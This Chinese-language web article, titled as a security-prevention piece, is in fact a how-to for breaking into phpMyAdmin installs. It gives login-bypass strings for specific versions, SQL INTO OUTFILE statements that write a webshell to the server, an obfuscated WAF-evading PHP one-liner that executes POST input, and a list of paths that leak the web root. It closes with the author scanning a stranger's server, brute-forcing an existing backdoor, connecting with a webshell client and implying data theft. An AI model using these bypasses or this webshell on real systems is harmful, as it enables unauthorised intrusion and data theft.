频道栏目
首页 > 安全 > 网络安全 > 正文

安全防范之phpmyadmin漏洞解析

2017-02-17 09:25:05      个评论      
收藏   我要投稿

安全防范之phpmyadmin漏洞解析。phpmyadmin的漏洞相对来说,还是比较多的,对于吧里的新手来说,分享几个漏洞。

phpmyadmin2.11.3-2.11.4 这两个版本存在万能密码,直接使用‘localhost’@'@”为账号,密码不用输入。

phpmyadmin2.11.9.2 这个版本存在空口令。直接root用户登陆,密码不用

找这个的话 用自己的写的脚本,或者搜素引擎什么的,这里懂的人就懂了,不懂也不在这里说。

关于拿shell,----》root权限,并且有写文件权限 ----》导出的目录有写权限 ----》有的情况下,就算你这两个都有,但是服务器的一些配置还是会对这个有影响。。。。

在getshell之前先进入一个数据库

第一种,使用sql语句,创建一个表,添加一个字段,字段的内容为一句话,然后导出到php文件中,最后删除这个表,这个是最保险的方法

Create TABLE 表 (列 text NOT NULL)

Insert INTO 表 (列) VALUES('')

select 列 from 表 into outfile '路径'

Drop TABLE IF EXISTS 表;

第二种方法,这个是直接写入

select '一句话'INTO OUTFILE '路径'

还有几种方法,大致原理都一样。。。

{C}

然后,一般的话,一句话都是

有狗的话,用免杀一句话,下面这个是我过年前构造的过狗一句话,现在应该还可以过

$a = 's';

$str = str_repeat($a,2);

$to = $_POST;

//echo $str;

$exp = 'a'.$str[0].$str[1].'e'.'r'.'t';

$exp($to['x'])

?>

找路径的话,

1// 利用phpinfo.php

2//利用phpmyadmin的一些文件报错,下面都是网上通用的

/phpMyAdmin/index.php?lang[]=1

/phpMyAdmin/phpinfo.php

/load_file()

/phpmyadmin/themes/darkblue_orange/layout.inc.php

/phpmyadmin/libraries/select_lang.lib.php

/phpmyadmin/libraries/lect_lang.lib.php

/phpmyadmin/libraries/mcrypt.lib.php

/phpmyadmin/libraries/export/xls.php

3//再者就是利用网站包路径,这些会的都会了,不会的慢慢的就会了。。。

下面开始实战,脚本扫到一个IP,显示存在phpmyadmin,打开

\

一看这些php文件就是后门一句话,放到几万字典爆破,两秒钟,

\

直接菜刀链接。。。。。

这个肯定被人搞了,直接打包好东西,你懂的。。。提权什么的就不必要了

\
上一篇:基于虚拟化的安全(part1):引导过程
下一篇:基于虚拟化的安全(part2):内核通信
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站